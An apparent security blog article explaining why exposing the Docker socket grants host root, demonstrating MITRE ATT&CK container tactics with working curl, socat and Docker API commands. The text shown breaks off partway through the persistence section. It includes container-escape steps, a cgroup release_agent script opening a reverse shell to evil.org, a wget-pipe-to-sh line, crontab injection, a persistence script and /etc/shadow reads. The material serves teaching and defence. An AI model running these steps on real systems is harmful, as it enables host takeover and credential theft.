Why is Exposing the Docker Socket a Really Bad Idea?

It is written almost everywhere: do not expose the Docker socket on Linux! This is followed by the statement that doing so grants root access to the host. But why? What can be done and how? This is what we are about to explore in this article.

We are going to explore the primary means of communication with the Docker daemon (dockerd), the Docker socket. We will show what having read and write access to this socket placed under /var/run/docker.sock can lead to. We will also use actual examples to emphasize why this is a really bad idea. And yes, that is restricted to Linux only. Windows and macOS do not manage containers in the same way through Docker Desktop.

In the past, the Docker socket was exposed over TCP port 2375. Since it was a serious security issue with many sockets exposed on the Internet, it was changed to a locally bound UNIX socket or localhost.

Nonetheless, you still can find some Docker sockets exposed and, at least, a real world use case where the Docker socket needs to be mounted in your container : Traefik, the Cloud Native Application Proxy.

UNIX sockets for dummies

UNIX sockets are the same as network sockets except that a path and file are used as addresses for client-server communication. This method of communication is used for inter-process communication on the same machine. In addition, the same methods namely connect(), bind(), select(), read() and write() are used for a typical communication via network sockets. The communication protocol associated with the socket depends on the server. It can be custom or standard. For instance, a HTTP like protocol is used in order to communicate with the Docker daemon. Here is an example:

host@host:~$ curl -i -s --unix-socket /var/run/docker.sock -X GET http://localhost/containers/json

HTTP/1.1 200 OK
Api-Version: 1.41
Content-Type: application/json
Docker-Experimental: false
Ostype: linux
Server: Docker/20.10.6 (linux)
Date: Mon, 10 May 2021 07:26:11 GMT
Content-Length: 1714

[{"Id":"4d40a4f865009cbd96aaaf157622959411318af5b5bdc2a16cc661769326d316","Names":["/musing_swartz"],"Image":"alpine","ImageID":"sha256:6dbb9cc54074106d46d4ccb330f2a40a682d49dda5f4844962b7dce9fe44aaec","Command":"/bin/sh","Created":1620631524,"Ports":[],"Labels":{},"State":"running","Status":"Up 46 seconds","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"443b80c6a413c5f40c3c5dd5df0e56064f12a03941ae9f52ce2849d1c7b15cad","EndpointID":"aa45cf2556f1ba86103ffa656242dfcfddb745c74d73ea4d8f10f412c819f063","Gateway":"172.17.0.1","IPAddress":"172.17.0.3","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:03","DriverOpts":null}}},"Mounts":[]},{"Id":"739f2eaf254f709f8618f642f913cead72e8150220147f2e8c92efb41c415d67","Names":["/angry_shamir"],"Image":"ubuntu","ImageID":"sha256:7e0aa2d69a153215c790488ed1fcec162015e973e49962d438e18249d16fa9bd","Command":"/bin/bash","Created":1620631509,"Ports":[],"Labels":{},"State":"running","Status":"Up About a minute","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"443b80c6a413c5f40c3c5dd5df0e56064f12a03941ae9f52ce2849d1c7b15cad","EndpointID":"bcaaeaccb40a62beb073ebc169691a6143007bd238433eddab9a1cc7da5ffba1","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/var/run/docker.sock","Destination":"/var/run/docker.sock","Mode":"","RW":true,"Propagation":"rprivate"}]}]

In the above example, we reached the Docker daemon through the socket and asked it to list the currently existing containers on the host machine (alpine and ubuntu here). If curl is not available, we can get the same result using socat:

host@host:~$ echo "GET /containers/json HTTP/1.0\r\n\r\n" | socat -  UNIX-CONNECT:/var/run/docker.sock
HTTP/1.0 200 OK
Api-Version: 1.41
Content-Type: application/json
...

This is actually equivalent to the docker ps command, which sends the same request to the Docker daemon but displays less information by default:

host@host:~$ docker ps
CONTAINER ID   IMAGE     COMMAND       CREATED              STATUS              PORTS     NAMES
4d40a4f86500   alpine    "/bin/sh"     About a minute ago   Up About a minute             musing_swartz
739f2eaf254f   ubuntu    "/bin/bash"   About a minute ago   Up About a minute             angry_shamir

But since the socket is a file in the Linux world we need the proper permissions to access that socket:

host@host:~$ ls -al /var/run/docker.sock
srw-rw---- 1 root docker 0 May  5 16:37 /var/run/docker.sock

So, we must either be root or belong to the docker group, which is true for my current user:

host@host:~$ groups fred
fred : fred adm cdrom sudo dip plugdev lxd docker

Last but not least, we are talking to a file, so the URL prefix http://localhost is not really meaningful:

host@host:~$ curl -i -s --unix-socket /var/run/docker.sock -X GET http://google.com/containers/4d40/top
HTTP/1.1 200 OK
...

Obviously, the above request is not listing all containers from google.com using the local UNIX socket. We can put a name, an IP address, or whatever illegal string we want. This is because Docker strips everything before the first subdirectory (the protocol and the domain name).

host@host:~$ curl -i -s --unix-socket /var/run/docker.sock -X GET http:/,/containers/json
HTTP/1.1 200 OK
....
host@host:~$ curl -i -s --unix-socket /var/run/docker.sock -X GET http:/8.8.8.8/containers/json
HTTP/1.1 200 OK
....
host@host:~$ curl -i -s --unix-socket /var/run/docker.sock -X GET http:/here-we-put-whatever/containers/json
HTTP/1.1 200 OK

The Docker socket

The Docker socket exposes the Docker API. The usual client is the docker command which triggers the docker-cli engine. So let’s look what is happening on the client side when executing this command:

host@host:~$ strace -e %net,read,write  docker ps
// Create a socket entity and configure
socket(AF_UNIX, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3
setsockopt(3, SOL_SOCKET, SO_BROADCAST, [1], 4) = 0
connect(3, {sa_family=AF_UNIX, sun_path="/var/run/docker.sock"}, 23) = 0
getsockname(3, {sa_family=AF_UNIX}, [112->2]) = 0
getpeername(3, {sa_family=AF_UNIX, sun_path="/run/docker.sock"}, [112->19]) = 0
read(3, 0xc00001a000, 4096)             = -1 EAGAIN (Resource temporarily unavailable)
// Test it
write(3, "HEAD /_ping HTTP/1.1\r\nHost: docker\r\nUser-Agent: Docker-Client/20.10.6 (linux)\r\n\r\n", 81) = 81
read(3, "HTTP/1.1 200 OK\r\nApi-Version: 1.41\r\nCache-Control: no-cache, no-store, must-revalidate\r\nContent-Length: 0\r\nContent-Type: text/plain; charset=utf-8\r\nDocker-Experimental: false\r\nOstype: linux\r\nPragma: no-cache\r\nServer: Docker/20.10.6 (linux)\r\nDate: Thu, 06 M"..., 4096) = 280
read(3, 0xc00001a000, 4096)             = -1 EAGAIN (Resource temporarily unavailable)
// Same command as the one we sent with curl
write(3, "GET /v1.41/containers/json HTTP/1.1\r\nHost: docker\r\nUser-Agent: Docker-Client/20.10.6 (linux)\r\n\r\n", 96) = 96
read(3, "HTTP/1.1 200 OK\r\nApi-Version: 1.41\r\nContent-Type: application/json\r\nDocker-Experimental: false\r\nOstype: linux\r\nServer: Docker/20.10.6 (linux)\r\nDate: Thu, 06 May 2021 09:03:06 GMT\r\nContent-Length: 1716\r\n\r\n[{\"Id\":\"4d40a4f865009cbd96aaaf157622959411318af5b5bd"..., 4096) = 1920
read(3, 0xc00001a000, 4096)             = -1 EAGAIN (Resource temporarily unavailable)
// Writing to stdout
write(1, "CONTAINER ID", 12CONTAINER ID)            = 12
...

Looking at what is happening on the cli side when executing the docker ps command, we see the regular operations:

  1. creating a socket entity socket;
  2. connecting it to the server via the socket under /var/run/docker.sock;
  3. reading and writing messages.

The important point is that the commands sent to the Docker socket are the same as the ones we sent with curl manually. We can conclude that we can use the exposed Docker API without the need of the docker client.

The main objects available through the API are containers, images, networks, and volumes plus other utilities related to Docker swarm. The format pattern to retrieve and manipulate these objects generally has the following form <object>/<id>/<command>. In the next example, we retrieve the list of processes in one of the containers currently running on the host (equivalent to docker top 4d40a4f86500):

host@host:~$ curl -i -s --unix-socket /var/run/docker.sock -X GET http://localhost/containers/4d40a4f865009cbd96aaaf157622959411318af5b5bdc2a16cc661769326d316/top

HTTP/1.1 200 OK
Api-Version: 1.41
Content-Type: application/json
Docker-Experimental: false
Ostype: linux
Server: Docker/20.10.6 (linux)
Date: Thu, 06 May 2021 09:33:47 GMT
Content-Length: 272

{"Processes":[["root","9300","9278","0","07:20","pts/0","00:00:00","/bin/sh"],["root","9333","9300","0","07:20","pts/0","00:00:03","ping google.com"],["root","9334","9300","0","07:20","pts/0","00:00:01","top"]],"Titles":["UID","PID","PPID","C","STIME","TTY","TIME","CMD"]}

Useful tip for the next experiments: we do not have to use the full ID of a container in order to obtain information about it. The server side identifies the right container not by exact matching, but immediate matching (the first container ID matching the prefix is chosen):

host@host:~$ curl -i -s --unix-socket /var/run/docker.sock -X GET http://localhost/containers/4/top
HTTP/1.1 200 OK
....
{"Processes":[["root","9300","9278","0","07:20","pts/0","00:00:00","/bin/sh"],["root","9333","9300","0","07:20","pts/0","00:00:03","ping google.com"],["root","9334","9300","0","07:20","pts/0","00:00:01","top"]],"Titles":["UID","PID","PPID","C","STIME","TTY","TIME","CMD"]}

The above command gives exactly the same result as the previous one where we specified the full ID. That is because there is only one container starting with character 4 so far and the server knows right away which container we refer to.

Interlude

As we have illustrated in the previous lines, the Docker socket is a direct way to communicate with the Docker daemon running on the host.

Mounting that socket in a container with read and write privileges is equivalent to giving open access to the Docker daemon on the host from inside a container. Having this access, one can control the docker daemon which is a process running under effective UID 0. But containers are supposed to create isolation from each other and from the host, thus this action violates the intended isolation of this technology.

Hence, with access to the Docker socket, one can access the host and the other containers. This is what we will describe in the next sections.

In the current environment we define:

  • the host, identified by the host@host:~$ prompt;
  • an adversary, identified by the attacker@evil:~$ prompt;
  • an alpine image (4d40a4f86500) with various commands running;
  • an Ubuntu image (739f2eaf254f) with curl and a few other tools installed and a mounted Docker socket under /var/run/docker.sock.
host@host:~$ docker run -t -i -v /var/run/docker.sock:/var/run/docker.sock ubuntu /bin/bash

MITRE ATT&CK® matrix for containers with read/write access to an exposed socket

From here, we will consider the new (April 2021) MITRE ATT&CK® for Docker containers as a guide to what this configuration can lead to. We will study the impact of an exposed Docker socket with read/write privileges by giving a practical example of one dimension of each vector in the matrix.

Each part below starts with a short reminder / definition of the tactic extracted from MITRE matrix, for which we will provide technique(s). Some techniques are in different tactics, but we arbitrary decided to put them here or there.

Initial access

The adversary is trying to get into your network.

Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network.

All this article is based on the hypothesis that we already have access to an exposed Docker socket, either from a remote network, in case an admin would have exposed it, or from inside a container because it’s bound in it for whatever reasons… Moreover, we consider the default configuration, for instance without user remap.

As a matter of fact, so far, we only mentioned the Docker socket as a UNIX domain socket, hence local. However, it is possible to connect the Docker socket to a TCP port. By default, connections to that port will be un-encrypted and unauthenticated:

host@host:~$ sudo dockerd -H unix:///var/run/docker.sock -H tcp://0.0.0.0:2375
...
host@host:~$ curl http:/localhost:2375/containers/json -X GET
[{"Id":"4d40a4f865009cbd96aaaf157622959411318af5b5bdc2a16cc661769326d316","Names":["/musing_swartz"],"Image":"alpine","ImageID":"sha256:6dbb9cc54074106d46d4ccb330f2a40a682d49dda5f4844962b7dce9fe44aaec","Command":"/bin/sh","Created":1620631524,"Ports":[],"Labels":{},"State":"running","Status":"Up 46 seconds","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"443b80c6a413c5f40c3c5dd5df0e56064f12a03941ae9f52ce2849d1c7b15cad","EndpointID":"aa45cf2556f1ba86103ffa656242dfcfddb745c74d73ea4d8f10f412c819f063","Gateway":"172.17.0.1","IPAddress":"172.17.0.3","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:03","DriverOpts":null}}},"Mounts":[]},{"Id":"739f2eaf254f709f8618f642f913cead72e8150220147f2e8c92efb41c415d67","Names":["/angry_shamir"],"Image":"ubuntu","ImageID":"sha256:7e0aa2d69a153215c790488ed1fcec162015e973e49962d438e18249d16fa9bd","Command":"/bin/bash","Created":1620631509,"Ports":[],"Labels":{},"State":"running","Status":"Up About a minute","HostConfig":{"NetworkMode":"default"},"NetworkSettings":{"Networks":{"bridge":{"IPAMConfig":null,"Links":null,"Aliases":null,"NetworkID":"443b80c6a413c5f40c3c5dd5df0e56064f12a03941ae9f52ce2849d1c7b15cad","EndpointID":"bcaaeaccb40a62beb073ebc169691a6143007bd238433eddab9a1cc7da5ffba1","Gateway":"172.17.0.1","IPAddress":"172.17.0.2","IPPrefixLen":16,"IPv6Gateway":"","GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"MacAddress":"02:42:ac:11:00:02","DriverOpts":null}}},"Mounts":[{"Type":"bind","Source":"/var/run/docker.sock","Destination":"/var/run/docker.sock","Mode":"","RW":true,"Propagation":"rprivate"}]}]

This will make the Docker daemon reachable on all IPv4 addresses of the host network interface, through port 2375. We can then send the same commands as the previous ones with curl except we only have to provide the actual IP address of the machine and not a dummy one.

In April 2020, the Kinsing malware was uncovered. It was scanning the Internet for Docker sockets which were accessible and not well protected. Once found, Kinsing started an ubuntu container on the host machine in order to download a cryptominer and then spread it along other containers. Apart from that, the Docker socket is not really involved in initial access as it depends on the application running in a container.

Execution

The adversary is trying to run malicious code.

Execution consists of techniques that result in adversary-controlled code running on a local or remote system.

What we present first here is not a specific technique, just a demonstration of how straightforward it is to run an arbitrary command in any other container.

From inside the Ubuntu image, we can talk directly to the Docker daemon using the mounted socket. Hence, we start a new ping in the alpine container from the Ubuntu one. This is done with the combo exec+start in Docker API language:

root@739f2eaf254f:/# curl -i -s --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json" \
  -d '{"AttachStdin":false, "AttachStdout":true, "AttachStderr":true, "Tty":false, "Privileged":false, "Cmd":["ping","docker.com"]}' \
    http://localhost/containers/4d40/exec

HTTP/1.1 201 Created
...
{"Id":"4c60354e04617c20fa998e3b6dfda05b6bb3a369692eddfaa98d527beae99392"}

root@739f2eaf254f:/# curl -i -s --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json" \
  -d '{"Detach": false,"Tty": false}' \
  http://localhost/exec/4c60354e04617c20fa998e3b6dfda05b6bb3a369692eddfaa98d527beae99392/start

HTTP/1.1 200 OK
...

The HTTP code indicates a success, which we can also see by looking at the running processes inside the alpine container:

host@host:~$ docker top 4d40
UID          PID          PPID       C      STIME      TTY      TIME        CMD
root         6796         6746       0      May13      pts/0    00:00:00    /bin/sh
root         50986        6746       0      17:05      ?        00:00:00    ping docker.com

We can do whatever we want from that Ubuntu container to any other container running on the host thanks to the mounted Docker socket. Instead of a ping, it could be a command like:

>> wget -q -O - --no-check-certificate https://evil.org/x.sh | sh

This would allow an attacker to download and run a script inside the container. See the Deploy container section for details about this scenario.

Container administration command

Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.

In the Ubuntu container, we have access to the Docker daemon through the mounted UNIX socket, so of course we can run whatever container administrative command we want. We only have to “speak” the right language at the right place.

Here, for instance, we rename the alpine container with id 4d40 into pwned from inside the Ubuntu container:

#inside the Ubuntu container
root@739f2eaf254f:/# curl -i -s --unix-socket /var/run/docker.sock -X POST \
  -d "name=pwned" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  http://localhost/containers/4d40/rename

HTTP/1.1 204 No Content
...

host@host:~$ docker ps
CONTAINER ID   IMAGE     COMMAND       CREATED        STATUS        PORTS     NAMES
4d40a4f86500   alpine    "/bin/sh"     22 hours ago   Up 22 hours             pwned
739f2eaf254f   ubuntu    "/bin/bash"   22 hours ago   Up 22 hours             heuristic_poitras

We give here a simple example, but don’t forget that the Docker socket is the interface to the Docker engine, hence grants access to the administrative API. So, the possibilities are all those exposed by the Docker API.

Container deployment

Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.

First, as an attacker, suppose we prepare an evil container. For explanation purposes, we simply took an old alpine:2.6 image, and we will setup a (fake) web server in order to provide the image:

attacker@evil:~$ docker pull alpine:2.6
 # do whatever you want, then commit, then save as below to have a custom image tarball
attacker@evil~$ docker run -ti alpine:2.6 /bin/sh
/ # vi evil.sh
...
/ # chmod +x evil.sh
/ # ./evil.sh
Hahaha pwned by master of evil containers!
CTRL-p, CTRL-q # Detach from the running container
attacker@evil~$ docker export 811750df3a31 > evil.tar
# Next, start a very advance HTTP server
attacker@evil~$ { printf 'HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n'   "$(wc -c < evil.tar)"; cat evil.tar; } | nc -l 8080

Now, let’s move to the Ubuntu container on the targeted host, where we have access to the Docker socket, and try to pull that image on this host (yes, we told you that granting access to the Docker socket was a bad idea). We are going to download a new image on the host and deploy a container using this image:

root@739f2eaf254f:/# curl --unix-socket /var/run/docker.sock -X POST   "http://localhost/images/create?fromSrc=http://192.168.1.28:8080/evil.tar&repo=evil%3A13.37"
{"status":"Downloading from http://192.168.1.28:8080/evil.tar"}
{"status":"Importing","progressDetail":{"current":69588,"total":4874240},"progress":"[\u003e                                                  ]  69.59kB/4.874MB"}
{"status":"Importing","progressDetail":{"current":987092,"total":4874240},"progress":"[==========\u003e                                        ]  987.1kB/4.874MB"}
{"status":"Importing","progressDetail":{"current":4067284,"total":4874240},"progress":"[=========================================\u003e         ]  4.067MB/4.874MB"}
{"status":"Importing","progressDetail":{"current":4874240,"total":4874240},"progress":"[==================================================\u003e]  4.874MB/4.874MB"}
{"status":"sha256:4c1cc6c8f6d48b48e41bac270efc05bbb250c401a217555c300085679c7b11af"}

Oops, it seems it worked. Let’s go back to the host to verify that:

host@host:~$ docker images
REPOSITORY            TAG       IMAGE ID       CREATED         SIZE
evil                  13.37     4c1cc6c8f6d4   2 minutes ago   4.5MB
ubuntu                latest    7e0aa2d69a15   6 weeks ago     72.7MB
alpine                latest    6dbb9cc54074   8 weeks ago     5.61MB

Yes!!! Now that we have the image, let’s create the container using this image and execute our malicious evil.sh script from within:

root@739f2eaf254f:/# curl -i -s --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json"  \
  -d '{"AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"Tty":true,"OpenStdin":true,"StdinOnce":true,"DetachKeys":"Ctrl-p,Ctrl-q","Cmd":["/bin/sh","-c","/evil.sh"],"Image":"evil:13.37"}' \
  http://localhost/containers/create

HTTP/1.1 201 Created
...
{"Id":"3b8b99805ee2179c8c1b2ad903b51888e82806d194ef093b12a68469d8f39980","Warnings":[]}

The container with prefix 3b8b is now created. However it is not running so we need to start it:

root@739f2eaf254f:/# curl -i -s --unix-socket /var/run/docker.sock -X POST \
  http://localhost/containers/3b8b/start

HTTP/1.1 204 No Content
...

The return code being in the 200 family means that our command worked: the container program has been executed by the host. But did our evil.sh script really execute? We can look at the logs on the host:

host@host:~$ docker ps -a | grep 3b8b
3b8b99805ee2   evil:13.37   "/bin/sh -c /evil.sh"   2 minutes ago    Exited (0) 6 minutes ago              eager_bardeen
host@host:~$ docker logs 3b8b
Hahaha pwned by master of evil containers!

And here we are. From inside a container, we downloaded, deployed a new image, instantiated a new container using it and executed a program embedded inside the image. In that way, adversary controlled code was executed on the host.

Privilege escalation

The adversary is trying to gain higher-level permissions.

Privilege escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network.

This is also quite simple when we have the exposed socket under our control: we will use a Scheduled Task/Job to Escape to host. Here is the short description of this tactic:

Escape to host

Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.

We will present 2 techniques to escape to host: one using a bind mount, one using cgroups.

Escaping to host using a bind mount

The clear separation when the Docker socket is inside a container is obviously a missed boundary. We will start a new container, mount the root file system in it, and use it to run a command on the host.

In order to achieve that, we are going to do the following:

  1. create a container bind mounting the host file system;
  2. execute the container (run the container);
  3. connect to the new container from our current container;
  4. schedule a cron job on the host since we will have access to the host file system.

To do that, let’s first find what images are available on the targeted host:

root@739f2eaf254f:/# curl --unix-socket /var/run/docker.sock -X GET "http://localhost/images/json"
[
  {"Containers":-1,"Created":1619216497,"Id":"sha256:7e0aa2d69a153215c790488ed1fcec162015e973e49962d438e18249d16fa9bd","Labels":null,"ParentId":"","RepoDigests":["ubuntu@sha256:cf31af331f38d1d7158470e095b132acd126a7180a54f263d386da88eb681d93"],"RepoTags":["ubuntu:latest"],"SharedSize":-1,"Size":72704716,"VirtualSize":72704716},
  {"Containers":-1,"Created":1618427979,"Id":"sha256:6dbb9cc54074106d46d4ccb330f2a40a682d49dda5f4844962b7dce9fe44aaec","Labels":null,"ParentId":"","RepoDigests":["alpine@sha256:69e70a79f2d41ab5d637de98c1e0b055206ba40a8145e7bddb55ccc04e13cf8f"],"RepoTags":["alpine:latest"],"SharedSize":-1,"Size":5613158,"VirtualSize":5613158},
]

We can see 2 images, including an alpine one. Hence, we prepare our container, based on the present alpine image. This time, when creating the container we will use a bind mount in order to obtain access to the host filesystem. Finally, we will change the root directory of our container process using chroot to the root directory of the host file system in order to change the context of the container process:

root@739f2eaf254f:/# curl --unix-socket /var/run/docker.sock -X POST \
  -H "Content-Type: application/json"  \
  -d '{"AttachStdin":true, "AttachStdout":true, "AttachStderr":true, "Tty":true, "OpenStdin":true, "StdinOnce":true, "DetachKeys":"Ctrl-p,Ctrl-q", "Cmd":["chroot","/host","/bin/bash"], "Image":"alpine", "Binds":["/:/host"]}' \
   http://localhost/containers/create?name=rootfs

{"Id":"2997eb099cef17b380e86824c172334d4e056554ae7477458fe5cc4506b5167b","Warnings":[]}

Now our container with an ID starting with 299 is created and it is ready to be started. We are going to start it and then attach to it using socat. Remember that we executed chroot /host, thus the container process will be able to use the host binaries:

# start the container
root@739f2eaf254f:/# curl -i --unix-socket /var/run/docker.sock "http://localhost/containers/2997eb/start" -X POST
HTTP/1.1 204 No Content
Api-Version: 1.41
...

root@739f2eaf254f:/# socat - UNIX-CONNECT:/var/run/docker.sock
POST /containers/2997eb099cef/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp

HTTP/1.1 101 UPGRADED
Content-Type: application/vnd.docker.raw-stream
Connection: Upgrade
Upgrade: tcp

# the http connection has been hijacked to transport stdin/stdout/stderr data flow
root@2997eb099cef:/# ls
ls
bin   cdrom  etc   lib    lib64   lost+found  mnt  proc  run   snap  sys  usr
boot  dev    home  lib32  libx32  media       opt  root  sbin  srv   tmp  var
root@2997eb099cef:/# ps
ps
    PID TTY          TIME CMD
  55172 pts/0    00:00:00 bash
  56068 pts/0    00:00:00 ps
root@2997eb099cef:/# ps aux | head -n 7
ps aux | head -n 7
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.0 169476 13668 ?        Ss   10:28   0:10 /lib/systemd/systemd --system --deserialize 21
root           2  0.0  0.0      0     0 ?        S    10:28   0:00 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<   10:28   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<   10:28   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<   10:28   0:00 [kworker/0:0H-kblockd]
root           9  0.0  0.0      0     0 ?        I<   10:28   0:00 [mm_percpu_wq]

But what happened ? Why are we able to see all the host processes within the container environment ? We attached to the container we previously created and started. But this is a “special” container as we set its root directory to be root directory of the host. Hence, we can also access the host proc filesystem which allows us to see all the processes running on the host, even while being inside a container. However, our container is still under the limitation of the PID namespace, thus we can’t interact with processes which are not defined as members of the container process PID namespace.

root@2997eb099cef:/# kill 2
kill 2
bash: kill: (2) - No such process

Next we will execute, still from our container, a command on the host environment (i.e. outside of the container one) using crontab:

root@2997eb099cef:/etc# echo "* * * * * root ping -c 20 google.com" >> crontab
root@2997eb099cef:/etc# /etc/init.d/cron reload
 * Reloading configuration files for periodic command scheduler cron  [ OK ]

host@host:~$ ps aux | grep ping | grep -v grep
root       13650  0.0  0.0   2616   596 ?        Ss   16:57   0:00 /bin/sh -c ping -c 20 google.com
root       13651  0.0  0.0  18472  2708 ?        S    16:57   0:00 ping -c 20 google.com

Et voilà! We executed a command on the host :). This program doesn’t have the limitations imposed on the container by the namespace technology hence we achieved privilege escalation. Once we have access to the root file system, imagination is the limit actually.

Escaping to host using the cgroups

In this section we will use a well known scenario of privilege escalation, combined with our initial constraint (the exposed Docker socket). First, we prepare our script to inject on the host with the exposed Docker socket:

attacker@evil:~ $ cat wazaa.sh
#!/bin/sh
rmIP="evil.org";
rmPort="1337";
mkdir -p /tmp/cgroup && mount -t cgroup -o memory cgroup /tmp/cgroup && mkdir -p /tmp/cgroup/child;
echo 1 > /tmp/cgroup/child/notify_on_release # notify parent cgroup that a child cgroup has exited
command_exec_path=$(cat /etc/mtab | grep -oP "upperdir=\K/var/lib/docker/overlay2/\w+/diff")
echo "$command_exec_path/reverse_shell.sh" > /tmp/cgroup/release_agent;
echo "#!/bin/bash" > reverse_shell.sh;
echo "bash -i &> /dev/tcp/$rmIP/$rmPort 0>&1" >> reverse_shell.sh;
chmod 777 reverse_shell.sh;
sh -c "echo \$\$ > /tmp/cgroup/child/cgroup.procs"; # create a child process which exists and triggers the handler

This script does the following:

  1. mount the cgroup virtual filesystem inside the file system of the container under the name cgroup;
  2. create a child directory cgroup under the mount;
  3. set a callback so that when the child cgroup is released (no process is bound inside), an event is triggered which opens a reverse shell.

Last but not least, we prepare our connect-back with a netcat listening on port 1337:

attacker@evil:~ $ nc -l 1337

We need to build a container to access the host’s filesystem and play our script. For that, we construct our evil container from an alpine image, we copy our script, and set it as the command that should be executed when the container is started:

attacker@evil:~ $ cat Dockerfile
FROM alpine
RUN apk update && apk add curl && apk add grep;
COPY ./wazaa.sh  /wazaa.sh

We build the image (skipped - see previous sections) and download it on the host:

root@739f2eaf254f:/# curl --unix-socket /var/run/docker.sock -X POST   "http://localhost/images/create?fromSrc=http://192.168.1.28:8080/creadacc.tar&repo=creds%3Alatest"
...
{"status":"sha256:5d49c05b199bbb49621db17077217f52d41c38607826c8d6faa071f4ba99f15c"}

Now it’s time for the show. We are going to start a container using the creds image. In addition, we will define this container as privileged (option "Privileged":true below). A privileged container is a container with almost no isolation from the host: capabilities are not dropped, processes “inside” the container lack restrictions from Seccomp and AppArmor.

root@739f2eaf254f:/# curl -i --unix-socket /var/run/docker.sock -X POST  \
    -H "Content-Type: application/json" \
    -d '{"AttachStdin":true,"AttachStdout":true,"AttachStderr":true, "Privileged":true, "Tty":true,"OpenStdin":true,"StdinOnce":true,"DetachKeys":"Ctrl-p,Ctrl-q","Cmd":["/bin/sh", "-c", "/wazaa.sh"], "Image":"creds"}' \
    http://localhost/containers/create

HTTP/1.1 201 Created
Api-Version: 1.41
...
{"Id":"889a3b8a91403a702ab513e44268228571d7365d127a0d69e4324dd275f30107","Warnings":[]}

Next, we start that privileged container, which will connect to our evil machine:

# Our new container is started, connecting back to evil.org
root@739f2eaf254f:/# curl -i --unix-socket /var/run/docker.sock -X POST http://localhost/containers/889/start

# shell 1
odbash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@host:/# whoami
whoami
root
root@host:/# cat /etc/shadow | tail -n 2
cat /etc/shadow | tail -n 2
gdm:*:18737:0:99999:7:::
crypto:$6$JtE1EShg6gk.xLbA$a1RWywxkrbSGKbyZ6dNV6GHHnBO38Mz.T.5tLONZgW2FDKHyT.gDj7yJogRyIskpUpTQxNW/m2HKLu
...

Yes, we are root on the host and we can inspect all the credentials currently available!

Persistence

The adversary is trying to maintain their foothold.

Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.

There are different techniques to achieve that.

Valid Accounts

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.

To obtain persistence, we will use the Docker socket from a container on the target in order to again download and run one of our evil containers. In that evil container, we will plant a script which is going to populate the /etc/profile.d of the host. The contents of this file are executed each time an interactive login shell (e.g. ssh) is started. We also consider that the default interactive login shell is bash.

attacker@evil:~$ cat 02-backup_gnome.sh
docker container inspect pwned 2>/dev/null 1>/dev/null;
if [ $? -eq 1 ]; then
    name=$(ls /tmp | sort -R | tail -n 1 | egrep -o '[[:alnum:]]{7}' | head -n 1)
    2>/dev/null 1>/dev/null docker run -it -d -v /:/host --name pwned$name alpine chroot /host /bin/bash
fi

The script checks if a container with a name prefixed by pwned is currently running on the host. If it is not, it chooses a random file name from the /tmp directory and appends it to the same prefix (pwned) and it launches a container with this name. The container maintains an open shell process with changed root directory which is possible due to the bind-mount. Yes, it can be improved but that’s not the purpose.

Next, we create a Docker image containing this script by using the classic alpine Linux image. Then, we will make it available for download as before.

# building a small image containing the script
attacker@evil:~ $ cat Dockerfile
FROM alpine
COPY ./02-backup_gnome.sh /
attacker@evil:~ $ chmod a+x 02-backup_gnome.sh
attacker@evil:~ $ docker -build -t evil . < Dockerfile
# run a container in order to obtain the image FS in the form of
# tarball archive
attacker@evil:~ $ docker run -it -d --rm evil /bin/sh
dadb2f393c4108d77ca06cb2e8ffde6b9a740213205d877341c2294a32478053
attacker@evil:~ $ docker export -o evil.tar dadb
# put it again on our evolve web server
attacker@evil:~ $ {printf 'HTTP/1.0 200 OK\r\nContent-Length: %d\r%br\r%br'   "$(wc -c < evil.tar)"; cat evil.tar; } | nc -l 8080

We command the deployment of that image from within our Ubuntu container on the host, as seen previously. But this time, we will add some spices: we consider there is no alpine image on the host. Note that if there is one, we can just delete it through the Docker socket API, so that’s not really a problem (it might create some issues with existing containers, but we did not investigate that, sorry).

